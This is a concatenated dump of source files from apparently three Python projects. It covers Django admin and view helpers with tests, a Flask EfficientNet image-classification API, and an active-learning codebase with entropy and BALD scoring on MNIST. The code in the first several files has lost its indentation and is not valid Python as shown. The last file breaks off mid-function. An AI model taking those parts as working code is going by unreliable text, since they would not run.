#### File: ai_django_core/utils/math.py
```python
from math import ceil
def round_to_decimal(value, precision: float = 0.5) -> float:
"""
Helper function to round a given value to a specific precision, for example *.5
So 5.4 will be rounded to 5.5
"""
return round(precision * round(float(value) / precision), 1)
def round_up_decimal(value, precision: float = 0.5) -> float:
"""
Helper function to round a given value up a specific precision, for example *.5
So 5.4 will be rounded to 5.5 and 5.6 to 6.0
"""
return ceil(value * (1 / precision)) / (1 / precision)
```
#### File: ai_django_core/view_layer/views.py
```python
from django.shortcuts import render
from django.views import generic
from django.views.defaults import ERROR_403_TEMPLATE_NAME
from django.views.generic.detail import SingleObjectMixin
class CustomPermissionMixin(generic.View):
"""
This mixin provides the method `validate_permissions()` to create a space where custom, non-django-permissions
can live. This method will be called in the `dispatch()` method to avoid executing unnecessary logic in the
"permission denied" case.
"""
def validate_permissions(self) -> bool:
return True
def dispatch(self, request, *args, **kwargs):
if self.validate_permissions():
return super().dispatch(request, *args, **kwargs)
else:
return render(self.request, ERROR_403_TEMPLATE_NAME, status=403)
class RequestInFormKwargsMixin:
"""
    Injects the request into the form kwargs.
    Attention: It has to be removed in the form's __init__() (via .pop()).
"""
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({'request': self.request})
return kwargs
class ToggleView(SingleObjectMixin, generic.View):
"""
Generic view for updating an object without any user data being sent. Therefore, we don't need a form to validate
user input.
Most common use-case is toggling a flag inside an object.
"""
http_method_names = ('post',)
def post(self, request, *args, **kwargs):
raise NotImplementedError
```
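A hedged sketch of a concrete toggle view; the `Task` model, its `is_done` flag and the URL name are illustrative:
```python
from django.http import HttpResponseRedirect
from django.urls import reverse

from myapp.models import Task  # hypothetical model with a boolean "is_done" field


class ToggleTaskDoneView(ToggleView):
    model = Task

    def post(self, request, *args, **kwargs):
        task = self.get_object()
        task.is_done = not task.is_done
        task.save(update_fields=['is_done'])
        return HttpResponseRedirect(reverse('task-list'))  # hypothetical URL name
```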
#### File: admin/model_admin_mixins/test_deactivatable_change_view_admin_mixin.py
```python
from unittest import mock
from django.contrib.auth.models import User
from ai_django_core.admin.model_admins.mixins import DeactivatableChangeViewAdminMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from django.contrib import admin
from django.http import HttpResponseRedirect
from django.test import TestCase
class TestAdmin(DeactivatableChangeViewAdminMixin, admin.ModelAdmin):
pass
class DeactivatableChangeViewAdminMixinTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
# Use random model for this meta test
cls.admin = TestAdmin(admin_site=None, model=User)
cls.user = User.objects.create(username="test_user", is_superuser=False)
cls.super_user = User.objects.create(username="super_user", is_superuser=True)
def setUp(self) -> None:
super().setUp()
self.admin.enable_change_view = True
def test_can_see_change_view_positive_flag(self):
self.assertTrue(self.admin.can_see_change_view(request=self.get_request()))
def test_can_see_change_view_negative_flag(self):
self.admin.enable_change_view = False
self.assertFalse(self.admin.can_see_change_view(request=self.get_request()))
def test_get_list_display_links_can_see_method_called(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=True) as mock_method:
self.admin.get_list_display_links(request=self.get_request(user=self.user), list_display=('first_name',))
mock_method.assert_called_once()
def test_get_list_display_links_can_see_method_positive_flag(self):
field_tuple = ('first_name',)
self.assertEqual(list(field_tuple),
self.admin.get_list_display_links(request=self.get_request(user=self.user),
list_display=field_tuple))
def test_get_list_display_links_can_see_method_negative_flag(self):
self.admin.enable_change_view = False
self.assertIsNone(self.admin.get_list_display_links(request=self.get_request(user=self.user),
list_display=('first_name',)))
def test_change_view_can_see_method_called_because_of_positive_flag(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=True) as mocked_can_see_method:
with mock.patch('django.contrib.admin.ModelAdmin.change_view') as mocked_base_change_view:
self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
mocked_can_see_method.assert_called_once()
mocked_base_change_view.assert_called_once()
def test_change_view_can_see_method_not_called_because_of_negative_flag(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=False) as mocked_can_see_method:
with mock.patch('django.contrib.admin.ModelAdmin.change_view') as mocked_base_change_view:
self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
mocked_can_see_method.assert_called_once()
mocked_base_change_view.assert_not_called()
def test_change_view_can_see_method_not_called_but_redirect(self):
self.admin.enable_change_view = False
result = self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
self.assertIsInstance(result, HttpResponseRedirect)
```
#### File: admin/model_admin_mixins/test_fetch_parent_object_inline_mixin.py
```python
from unittest import mock
from django.contrib import admin
from django.contrib.auth.models import User
from django.test import TestCase
from ai_django_core.admin.model_admins.mixins import FetchParentObjectInlineMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from testapp.models import MySingleSignalModel, ForeignKeyRelatedModel
class ForeignKeyRelatedModelTabularInline(FetchParentObjectInlineMixin, admin.TabularInline):
model = ForeignKeyRelatedModel
class TestFetchParentObjectInlineMixinAdmin(admin.ModelAdmin):
inlines = (ForeignKeyRelatedModelTabularInline,)
class MockResolverResponse:
kwargs = None
class FetchParentObjectInlineMixinTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.super_user = User.objects.create(username='super_user', is_superuser=True)
admin.site.register(MySingleSignalModel, TestFetchParentObjectInlineMixinAdmin)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
admin.site.unregister(MySingleSignalModel)
def test_parent_model_is_set(self):
obj = MySingleSignalModel.objects.create(value=1)
model_admin = TestFetchParentObjectInlineMixinAdmin(model=MySingleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
inline_list = model_admin.inlines
self.assertGreater(len(inline_list), 0)
inline = inline_list[0](parent_model=MySingleSignalModel, admin_site=admin.site)
return_obj = MockResolverResponse()
return_obj.kwargs = {'object_id': obj.id}
with mock.patch.object(model_admin.inlines[0], '_resolve_url', return_value=return_obj):
inline.get_formset(request=request, obj=obj)
self.assertEqual(inline.parent_object, obj)
```
#### File: tests/drf/test_fields.py
```python
from django.test import TestCase
from rest_framework import serializers
from rest_framework.serializers import ListSerializer
from ai_django_core.drf.fields import RecursiveField
from testapp.models import ModelWithFkToSelf, ModelWithOneToOneToSelf
class TestManyTrueSerializer(serializers.ModelSerializer):
children = RecursiveField(many=True)
class Meta:
model = ModelWithFkToSelf
fields = [
'id',
'children',
]
class TestManyFalseSerializer(serializers.ModelSerializer):
peer = RecursiveField()
class Meta:
model = ModelWithOneToOneToSelf
fields = [
'id',
'peer',
]
class RecursiveFieldTest(TestCase):
def test_many_true_regular(self):
serializer = TestManyTrueSerializer()
self.assertIn('children', serializer.fields)
self.assertIsInstance(serializer.fields['children'], ListSerializer)
self.assertIsInstance(serializer.fields['children'].child, RecursiveField)
def test_many_true_representation(self):
mwfts_1 = ModelWithFkToSelf.objects.create(parent=None)
mwfts_2 = ModelWithFkToSelf.objects.create(parent=mwfts_1)
serializer = TestManyTrueSerializer(instance=mwfts_1)
representation = serializer.to_representation(instance=mwfts_1)
self.assertIsInstance(representation, dict)
self.assertIn('children', representation)
self.assertEqual(len(representation['children']), 1)
self.assertEqual(representation['children'][0]['id'], mwfts_2.id)
self.assertEqual(representation['children'][0]['children'], [])
def test_many_false_regular(self):
serializer = TestManyFalseSerializer()
self.assertIn('peer', serializer.fields)
self.assertIsInstance(serializer.fields['peer'], RecursiveField)
def test_many_false_representation(self):
mwotos_no_peer = ModelWithOneToOneToSelf.objects.create(peer=None)
mwotos_has_peer = ModelWithOneToOneToSelf.objects.create(peer=mwotos_no_peer)
serializer = TestManyFalseSerializer(instance=mwotos_has_peer)
representation = serializer.to_representation(instance=mwotos_has_peer)
self.assertIsInstance(representation, dict)
self.assertIn('peer', representation)
self.assertEqual(len(representation['peer']), 2)
self.assertEqual(representation['peer']['id'], mwotos_no_peer.id)
self.assertEqual(representation['peer']['peer'], None)
```
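`RecursiveField` lets a serializer nest itself, so trees of arbitrary depth serialize without hand-writing one serializer class per level. A sketch of the output shape for a three-level chain, reusing `TestManyTrueSerializer` and `ModelWithFkToSelf` from the tests above (the ids shown are placeholders):
```python
# Build a root -> child -> grandchild chain with the test model used above.
root = ModelWithFkToSelf.objects.create(parent=None)
child = ModelWithFkToSelf.objects.create(parent=root)
grandchild = ModelWithFkToSelf.objects.create(parent=child)

data = TestManyTrueSerializer(instance=root).data
# The field recurses until it reaches an empty children list, roughly:
# {
#     "id": 1,
#     "children": [
#         {"id": 2, "children": [
#             {"id": 3, "children": []},
#         ]},
#     ],
# }
```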
#### File: ai-django-core/tests/test_admin_model_admins_classes.py
```python
from django.contrib import admin
from django.contrib.auth.models import User
from django.test import TestCase
from ai_django_core.admin.model_admins.classes import ReadOnlyAdmin, EditableOnlyAdmin
from ai_django_core.tests.mixins import RequestProviderMixin
from testapp.models import MySingleSignalModel, MyMultipleSignalModel
class TestReadOnlyAdmin(ReadOnlyAdmin):
pass
class TestEditableOnlyAdmin(EditableOnlyAdmin):
pass
class AdminClassesTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.super_user = User.objects.create(username='super_user', is_superuser=True)
admin.site.register(MySingleSignalModel, TestReadOnlyAdmin)
admin.site.register(MyMultipleSignalModel, TestEditableOnlyAdmin)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
admin.site.unregister(MySingleSignalModel)
admin.site.unregister(MyMultipleSignalModel)
def test_read_only_admin_all_fields_readonly(self):
obj = MySingleSignalModel(value=1)
admin_class = TestReadOnlyAdmin(model=obj, admin_site=admin.site)
readonly_fields = admin_class.get_readonly_fields(request=self.get_request(), obj=obj)
self.assertEqual(len(readonly_fields), 2)
self.assertIn('id', readonly_fields)
self.assertIn('value', readonly_fields)
def test_read_only_admin_no_change_permissions(self):
admin_class = TestReadOnlyAdmin(model=MySingleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
self.assertFalse(admin_class.has_add_permission(request))
self.assertFalse(admin_class.has_change_permission(request))
self.assertFalse(admin_class.has_delete_permission(request))
def test_editable_only_admin_delete_action_removed(self):
obj = MyMultipleSignalModel(value=1)
admin_class = TestEditableOnlyAdmin(model=obj, admin_site=admin.site)
request = self.get_request(self.super_user)
actions = admin_class.get_actions(request=request)
self.assertNotIn('delete_selected', actions)
def test_editable_only_admin_no_change_permissions(self):
admin_class = TestEditableOnlyAdmin(model=MyMultipleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
self.assertTrue(admin_class.has_change_permission(request))
self.assertFalse(admin_class.has_add_permission(request))
self.assertFalse(admin_class.has_delete_permission(request))
```
#### File: ai-django-core/tests/test_scrubbing_service.py
```python
from django.test import TestCase, override_settings
from ai_django_core.services.custom_scrubber import AbstractScrubbingService
class AbstractScrubbingServiceTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.service = AbstractScrubbingService()
@override_settings(DEBUG=False)
def test_scrubber_debug_mode_needs_to_be_active(self):
self.assertEqual(self.service.process(), False)
@override_settings(DEBUG=True, INSTALLED_APPS=[])
def test_scrubber_needs_to_be_installed(self):
self.assertEqual(self.service.process(), False)
# todo write more tests
```
#### File: tests/view_layer/test_views.py
```python
from django.test import TestCase
from django.views.generic import View
from django.views.generic.detail import SingleObjectMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from ai_django_core.view_layer.views import ToggleView
class ToggleViewTest(RequestProviderMixin, TestCase):
def test_http_method_set_correctly(self):
self.assertEqual(ToggleView.http_method_names, ('post',))
def test_post_raises_not_implemented_error(self):
with self.assertRaises(NotImplementedError):
view = ToggleView()
view.post(request=self.get_request())
def test_class_inherits_from_single_object_mixin(self):
self.assertTrue(issubclass(ToggleView, SingleObjectMixin))
def test_class_inherits_from_generic_view(self):
self.assertTrue(issubclass(ToggleView, View))
``` |
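A concrete `ToggleView` only has to implement `post` and flip a flag on the object resolved by `SingleObjectMixin`. A hedged sketch, assuming a model with a boolean `is_active` field (the model, app, and URL name are illustrative):
```python
from django.http import HttpResponseRedirect
from django.urls import reverse
from ai_django_core.view_layer.views import ToggleView
from myapp.models import Subscription  # hypothetical model with an `is_active` flag

class SubscriptionToggleView(ToggleView):
    model = Subscription

    def post(self, request, *args, **kwargs):
        # SingleObjectMixin resolves the instance from the URL's pk/slug kwarg.
        obj = self.get_object()
        obj.is_active = not obj.is_active
        obj.save(update_fields=['is_active'])
        return HttpResponseRedirect(reverse('subscription-list'))
```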
{
"source": "jqueguiner/EfficientNet-api",
"score": 2
} |
#### File: EfficientNet-api/src/app.py
```python
import os
import sys
import subprocess
import requests
import ssl
import random
import string
import json
from flask import jsonify
from flask import Flask
from flask import request
from flask import send_file
import traceback
from app_utils import blur
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import get_multi_model_bin
import torch
from efficientnet_pytorch import EfficientNet
from PIL import Image
from torchvision import transforms
try: # Python 3.5+
from http import HTTPStatus
except ImportError:
try: # Python 3
from http import client as HTTPStatus
except ImportError: # Python 2
import httplib as HTTPStatus
app = Flask(__name__)
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route("/detect", methods=["POST"])
def detect():
input_path = generate_random_filename(upload_directory,"jpg")
try:
if 'file' in request.files:
file = request.files['file']
if allowed_file(file.filename):
file.save(input_path)
try:
top_k = request.form.getlist('top_k')[0]
except:
top_k = 5
else:
url = request.json["url"]
download(url, input_path)
try:
top_k = request.json["top_k"]
except:
top_k = 5
results = []
img = tfms(Image.open(input_path)).unsqueeze(0)
model.eval()
with torch.no_grad():
outputs = model(img)
for idx in torch.topk(outputs, k=int(top_k)).indices.squeeze(0).tolist():
prob = torch.softmax(outputs, dim=1)[0, idx].item()
labels = [x.strip() for x in labels_map[idx].split(',')]
results.append({
'label': labels[0],
'labels': labels,
'score': '{p:.2f}%'.format(p=prob*100)
})
return json.dumps(results), 200
except:
traceback.print_exc()
return {'message': 'input error'}, 400
finally:
clean_all([
input_path
])
if __name__ == '__main__':
global upload_directory, model_directory
global model, labels_map
global tfms
global ALLOWED_EXTENSIONS
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
upload_directory = '/src/upload/'
create_directory(upload_directory)
model_directory = '/src/model/'
create_directory(model_directory)
model_name = 'efficientnet-b5'
model = EfficientNet.from_pretrained(model_name)
model.eval()
model_url = "https://storage.gra.cloud.ovh.net/v1/AUTH_18b62333a540498882ff446ab602528b/pretrained-models/image/EfficientNet-PyTorch/"
labels_file = 'labels_map.txt'
get_model_bin(model_url + labels_file, model_directory + labels_file)
labels_map = json.load(open(model_directory + labels_file))
labels_map = [labels_map[str(i)] for i in range(1000)]
# Preprocess image
tfms = transforms.Compose([transforms.Resize(224), transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),])
port = 5000
host = '0.0.0.0'
app.run(host=host, port=port, threaded=True)
``` |
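The `/detect` endpoint above accepts either a JSON body with a `url` (the server downloads the image) or a multipart file upload, with an optional `top_k`. A small client sketch, assuming the service runs on localhost:5000; the image URL and file name are placeholders:
```python
import requests

# JSON variant: the server downloads the image itself.
resp = requests.post(
    "http://localhost:5000/detect",
    json={"url": "https://example.com/cat.jpg", "top_k": 3},
)
print(resp.status_code)     # 200 on success, 400 on input errors
print(resp.json())          # list of {"label", "labels", "score"} dicts

# File-upload variant: top_k goes in as a form field.
with open("cat.jpg", "rb") as f:
    resp = requests.post(
        "http://localhost:5000/detect",
        files={"file": ("cat.jpg", f, "image/jpeg")},
        data={"top_k": 3},
    )
print(resp.json())
```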
{
"source": "jqueguiner/haven",
"score": 2
} |
#### File: active_learning/src/active_learning.py
```python
import glob
import pylab as plt
import tqdm
import numpy as np
import torch
import json
import os
from torch.utils.data import sampler
from datetime import datetime
import pytz
import time
from skimage.color import label2rgb
from pycocotools import mask as maskUtils  # required by mask_to_rle / rle_to_mask below
def set_dropout_train(model):
flag = False
for name, module in model.named_modules():
if isinstance(module, torch.nn.Dropout) or isinstance(module, torch.nn.Dropout2d):
flag = True
module.train()
assert(flag)
def mask_to_rle(binmask):
# convert to numpy
if not isinstance(binmask, np.ndarray):
binmask = binmask.cpu().numpy()
# convert to rle
rle = maskUtils.encode(np.asfortranarray(binmask).astype("uint8"))
return rle
def rle_to_mask(rle):
# return a tensor in cuda
return torch.from_numpy(maskUtils.decode(rle))
def xlogy(x, y=None):
z = torch.zeros(())
if y is None:
y = x
assert y.min() >= 0
return x * torch.where(x == 0., z.cuda(), torch.log(y))
def create_tiny(dataset, size=5):
data = [dataset[i] for i in range(size)]
class TinyDataset(torch.nn.Module):
def __init__(self, data):
self.data = data
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
dataset = TinyDataset(data)
return dataset
@torch.no_grad()
def val_epoch(model, val_loader, epoch):
model.eval()
model.reset_val_metrics()
n_batches = len(val_loader)
pbar = tqdm.tqdm(desc="%d - Validating" % epoch, total=n_batches, leave=False)
for i, batch in enumerate(val_loader):
model.val_step(batch)
score = model.get_val_dict()["val_score"]
pbar.set_description("%d - Validating: %.4f" % (epoch, score))
pbar.update(1)
pbar.close()
return model.get_val_dict()
def assert_dropout_exists(model):
for name, child in model.named_modules():
flag = False
if isinstance(child, torch.nn.Dropout) or isinstance(child, torch.nn.Dropout2d):
flag = True
break
assert flag
def set_dropout_train(model):
for name, module in model.named_modules():
if isinstance(module, torch.nn.Dropout) or isinstance(module, torch.nn.Dropout2d):
module.train()
@torch.no_grad()
def score_pool(pool_set, model, batch_size, heuristic_name, reduction_name, epoch):
model.eval()
set_dropout_train(model)
pool_loader = torch.utils.data.DataLoader(pool_set, shuffle=False, batch_size=batch_size, num_workers=0)
score_list = torch.ones(len(pool_set)) * -1
pbar = tqdm.tqdm(desc="%d - Scoring pool" % epoch, total=len(pool_loader), leave=False)
s_ind = 0
for batch in pool_loader:
scores = heuristics.compute_heuristic_scores(model, batch,
heuristic_name=heuristic_name)
n_scores = len(scores)
if reduction_name == "sum":
scores_reduced = scores.view(n_scores, -1).sum(1)
elif reduction_name == "mean":
scores_reduced = scores.view(n_scores, -1).mean(1)
score_list[s_ind:s_ind+n_scores] = scores_reduced.cpu()
s_ind += n_scores
pbar.set_description("%d - Scoring pool" % epoch)
pbar.update(1)
pbar.close()
assert -1 not in score_list
return score_list
@torch.no_grad()
def get_probabilities_base(pool, model, n_mcmc, batch_size):
model.eval()
pool_loader = torch.utils.data.DataLoader(pool, shuffle=False, batch_size=batch_size)
prob_list = []
pbar = tqdm.tqdm(total=len(pool_loader), leave=False)
for batch in pool_loader:
probs = model.compute_probs(batch, n_mcmc=n_mcmc)
prob_list += [probs.cpu().numpy()]
pbar.set_description("Probs for active learning")
pbar.update(1)
pbar.close()
prob_arr = np.vstack(prob_list)
return prob_arr
def collate_fn(batch):
batch_dict = {}
for k in batch[0]:
batch_dict[k] = []
for i in range(len(batch)):
batch_dict[k] += [batch[i][k]]
# tuple(zip(*batch))
return batch_dict
def load_json(fname, decode=None):
with open(fname, "r") as json_file:
d = json.load(json_file)
return d
def save_json(fname, data):
with open(fname, "w") as json_file:
json.dump(data, json_file, indent=4, sort_keys=True)
#
# def load_latest(exp_dict, model, active_set, reset=False):
# exp_meta = em.get_exp_meta(exp_dict)
# history_path = exp_meta["savedir"] + "/history.pth"
# ckp_path = exp_meta["savedir"] + "/checkpoint.pth"
#
# if os.path.exists(ckp_path) and os.path.exists(history_path) and not reset:
# ckp = torch.load(ckp_path)
#
# model.load_state_dict(ckp['model_state_dict'])
# model.opt.load_state_dict(ckp['opt_state_dict'])
# history = mlkit_ut.load_pkl(history_path)
# score_dict = history["score_list"][-1]
# active_set._labelled = score_dict['labeled_data']
#
# else:
# print("Epoch 0: starting from scratch")
# history = {"score_list":[]}
#
# return model, history, active_set
#
# def save_latest(exp_dict, model, history):
# exp_meta = em.get_exp_meta(exp_dict)
# history_path = exp_meta["savedir"] + "/history.pth"
# ckp_path = exp_meta["savedir"] + "/checkpoint.pth"
#
# ckp = {"model_state_dict":model.state_dict(),
# "opt_state_dict":model.opt.state_dict()}
#
# torch.save(ckp, ckp_path)
# mlkit_ut.save_pkl(history_path, history)
def get_dataloader_dict(exp_dict, train_loader):
"""Get data loader dictionary."""
dataloader_dict = {}
if "n_total_iters" in exp_dict["option"]:
n_total_iters = int(exp_dict["option"]["n_total_iters"])
else:
n_total_iters = (len(train_loader.dataset) *
int(exp_dict["option"]["epochs"]))
n_total_iters = n_total_iters / int(exp_dict["option"]["batch_size"])
dataloader_dict["n_batches"] = len(train_loader)
dataloader_dict["n_total_iters"] = n_total_iters
return dataloader_dict
def load_ind_prev_images(savedir_base, exp_id):
path = savedir_base + "/%s/ind_prev/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
def load_selected_images(savedir_base, exp_id):
path = savedir_base + "/%s/selected/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
def load_selected_neg_images(savedir_base, exp_id):
path = savedir_base + "/%s/selected_neg/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
import copy
def get_prev_exp_dict(exp_dict):
exp_dict_prev = copy.deepcopy(exp_dict)
exp_dict_prev['savedir_base'] = exp_dict_prev['savedir_base'].replace("/non_borgy/","/borgy/")
exp_dict_prev["sampler_dict"]["stage"] = exp_dict["sampler_dict"]["stage"] - 1
return exp_dict_prev
def save_img_list(savedir_images, img_list):
os.makedirs(os.path.dirname(savedir_images),exist_ok=True)
for i, img in enumerate(img_list):
# plt.figure(figsize=(20,30))
plt.figure()
plt.imshow(img)
plt.xticks([])
plt.yticks([])
plt.tight_layout()
plt.savefig(savedir_images + "_%d.jpg" % i)
# plt.show()
plt.close()
class ExactSampler(sampler.Sampler):
def __init__(self, train_set, indices=np.arange(5)):
self.n_samples = len(train_set)
self.indices = indices
def __iter__(self):
indices = np.array(self.indices)
return iter(torch.from_numpy(indices).long())
def __len__(self):
return len(self.indices)
def time_to_montreal():
ts = time.time()
utc_dt = datetime.utcfromtimestamp(ts)
aware_utc_dt = utc_dt.replace(tzinfo=pytz.utc)
tz = pytz.timezone('America/Montreal')
dt = aware_utc_dt.astimezone(tz)
dt = datetime.fromtimestamp(ts, tz)
return dt.strftime("%I:%M %p (%b %d)")
```
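The `xlogy` helper above exists to encode the `0 · log 0 = 0` convention needed by entropy-style acquisition scores. The sketch below shows the textbook entropy and BALD computations on made-up MC-dropout probabilities; it follows the standard formulation rather than copying `score_on_batch` from models.py verbatim, and uses a CPU-only variant of `xlogy` (the original moves its zero tensor to CUDA):
```python
import torch

def xlogy_cpu(x, y=None):
    # Same convention as the xlogy helper above, but without the .cuda() call.
    if y is None:
        y = x
    zero = torch.zeros((), dtype=x.dtype)
    return x * torch.where(x == 0., zero, torch.log(y))

# Fake MC-dropout output: 8 stochastic passes, batch of 4, 10 classes.
n_mcmc, batch_size, n_classes = 8, 4, 10
probs_mcmc = torch.softmax(torch.randn(n_mcmc, batch_size, n_classes), dim=2)

# Predictive entropy: entropy of the MC-averaged distribution.
entropy_avg = -xlogy_cpu(probs_mcmc.mean(dim=0)).sum(dim=1)

# Expected entropy across the MC samples.
expected_entropy = -xlogy_cpu(probs_mcmc).sum(dim=2).mean(dim=0)

# BALD (mutual information): high when the passes disagree about confident predictions.
bald = entropy_avg - expected_entropy
print(bald.shape)   # torch.Size([4]) -- one acquisition score per pool example
```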
#### File: active_learning/src/datasets.py
```python
import os
import random
import numpy as np
import pylab as plt
import torch
import torchvision
import torchvision.transforms.functional as FT
from baal.utils.transforms import PILToLongTensor
from PIL import Image
from scipy.io import loadmat
from skimage.color import label2rgb
from skimage.io import imread
from skimage.transform import rescale
from sklearn.utils import shuffle
from torch import nn
from torch.utils.data import Dataset
from torchvision import datasets
from torchvision.transforms import functional as F
from torchvision.transforms import transforms
def get_dataset(dataset_name, split, datadir_base='', exp_dict=None):
# load dataset
if dataset_name == "mnist_binary":
dataset = Mnist(split=split, binary=True, datadir_base=datadir_base)
if dataset_name == "mnist_full":
dataset = Mnist(split=split, binary=False, datadir_base=datadir_base)
return dataset
class Mnist:
def __init__(self, split, binary=False, datadir_base=None):
self.split = split
transform = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5,), (0.5,))
])
if split == "train":
dataset = torchvision.datasets.MNIST(datadir_base, train=True,
download=True,
transform=transform)
elif split == "val":
dataset = torchvision.datasets.MNIST(datadir_base, train=False,
download=True,
transform=transform)
# get only two classes
if binary:
ind_class2 = dataset.targets == 2
ind_class8 = dataset.targets == 8
dc = torch.cat([dataset.data[ind_class2], dataset.data[ind_class8]])
tc = torch.cat([dataset.targets[ind_class2], dataset.targets[ind_class8]])
ind_shuffle = torch.randperm(dc.shape[0])
dataset.data = dc[ind_shuffle]
dataset.targets = tc[ind_shuffle]
self.dataset = dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, index):
images, labels = self.dataset[index]
batch = {"images": images,
"labels": labels,
"meta": {"index": index,
"image_id": index,
"split": self.split}}
return batch
```
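A quick sketch of how the `Mnist` wrapper above is consumed: each item is a dict, so the default collate function returns a dict of batched tensors. The module path and data directory are assumptions, and downloading MNIST needs network access:
```python
from torch.utils.data import DataLoader
from src.datasets import get_dataset   # assumed module path within this repo

train_set = get_dataset("mnist_binary", split="train", datadir_base="./data")
loader = DataLoader(train_set, batch_size=32, shuffle=True)

batch = next(iter(loader))
print(batch["images"].shape)        # torch.Size([32, 1, 28, 28])
print(batch["labels"].unique())     # tensor([2, 8]) for the binary variant
print(batch["meta"]["split"][:3])   # ['train', 'train', 'train']
```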
#### File: active_learning/src/models.py
```python
import torch
from torch import nn
import tqdm
import torch.nn.functional as F
import torchvision
from torchvision import transforms
import os
import numpy as np
import time
from src import active_learning as al
from sklearn.metrics import confusion_matrix
import skimage
from haven import haven_utils as hu
from torchvision import transforms
from src import models
def get_model(model_name, exp_dict):
if model_name == "clf":
if exp_dict['model']['base'] == 'lenet':
base = LeNeT()
model = ClfModel(base)
return model
class ClfModel(torch.nn.Module):
def __init__(self, model_base):
super().__init__()
self.model_base = model_base
self.opt = torch.optim.SGD(self.parameters(), lr=1e-3)
def get_state_dict(self):
state_dict = {"model": self.model_base.state_dict(),
"opt":self.opt.state_dict()}
return state_dict
def set_state_dict(self, state_dict):
self.model_base.load_state_dict(state_dict["model"])
self.opt.load_state_dict(state_dict["opt"])
def train_on_loader(model, train_loader):
model.train()
n_batches = len(train_loader)
pbar = tqdm.tqdm(desc="Training", total=n_batches, leave=False)
train_monitor = TrainMonitor()
for e in range(1):
for i, batch in enumerate(train_loader):
score_dict = model.train_on_batch(batch)
train_monitor.add(score_dict)
if i % 10 == 0:
msg = "%d/%d %s" % (i, n_batches, train_monitor.get_avg_score())
pbar.update(10)
pbar.set_description(msg)
pbar.close()
return train_monitor.get_avg_score()
@torch.no_grad()
def val_on_loader(model, val_loader, val_monitor):
model.eval()
n_batches = len(val_loader)
pbar = tqdm.tqdm(desc="Validating", total=n_batches, leave=False)
for i, batch in enumerate(val_loader):
score = model.val_on_batch(batch)
val_monitor.add(score)
if i % 10 == 0:
msg = "%d/%d %s" % (i, n_batches, val_monitor.get_avg_score())
pbar.update(10)
# print(msg)
pbar.set_description(msg)
pbar.close()
return val_monitor.get_avg_score()
def train_on_batch(self, batch, **extras):
self.opt.zero_grad()
labels = batch["labels"].cuda()
logits = self.model_base.forward(batch["images"].cuda())
loss_clf = F.cross_entropy(logits.squeeze(),
labels.squeeze(), reduction="mean")
loss_clf.backward()
self.opt.step()
return {"train_loss":loss_clf.item()}
def val_on_batch(self, batch, **extras):
pred_clf = self.predict_on_batch(batch)
return (pred_clf.cpu().numpy().ravel() != batch["labels"].numpy().ravel())
def predict_on_batch(self, batch):
images = batch["images"].cuda()
n = images.shape[0]
logits = self.model_base.forward(images)
return logits.argmax(dim=1)
@torch.no_grad()
def score_on_batch(self, batch, active_learning_dict):
if active_learning_dict['name'] == 'entropy':
probs_mcmc = self.mcmc_on_batch(batch, active_learning_dict)
entropy = - al.xlogy(probs_mcmc).mean(dim=0).sum(dim=1)
scores = entropy
elif active_learning_dict['name'] == 'bald':
# mean over mcmc and sum over classes
probs_mcmc = self.mcmc_on_batch(batch, active_learning_dict)
entropy = al.xlogy(probs_mcmc).mean(dim=0).sum(dim=1)
entropy_avg = al.xlogy(probs_mcmc.mean(dim=0)).sum(dim=1)
scores = - (entropy + entropy_avg)
else:
raise
return scores
def get_active_indices(self, active_set, active_learning_dict, sampler=None):
if active_learning_dict["name"] == "random":
indices = np.random.choice(len(active_set.pool),
active_learning_dict['ndata_to_label'])
return indices
else:
pool_loader = torch.utils.data.DataLoader(active_set.pool,
batch_size=active_learning_dict["batch_size_pool"],
drop_last=False)
n_pool = len(active_set.pool)
score_list = torch.ones(n_pool) * -1
pbar = tqdm.tqdm(desc="Scoring pool", total=n_pool, leave=False)
s_ind = 0
for batch in pool_loader:
scores = self.score_on_batch(batch, active_learning_dict)
n_scores = batch['images'].shape[0]
score_list[s_ind:s_ind+n_scores] = scores.cpu()
s_ind += n_scores
pbar.set_description("Scoring pool")
pbar.update(scores.shape[0])
pbar.close()
assert -1 not in score_list
# higher is better
scores, ranks = score_list.sort()
indices = ranks[-active_learning_dict['ndata_to_label']:]
return indices
def mcmc_on_batch(self, batch, active_learning_dict):
self.eval()
al.set_dropout_train(self)
# put images to cuda
images = batch["images"]
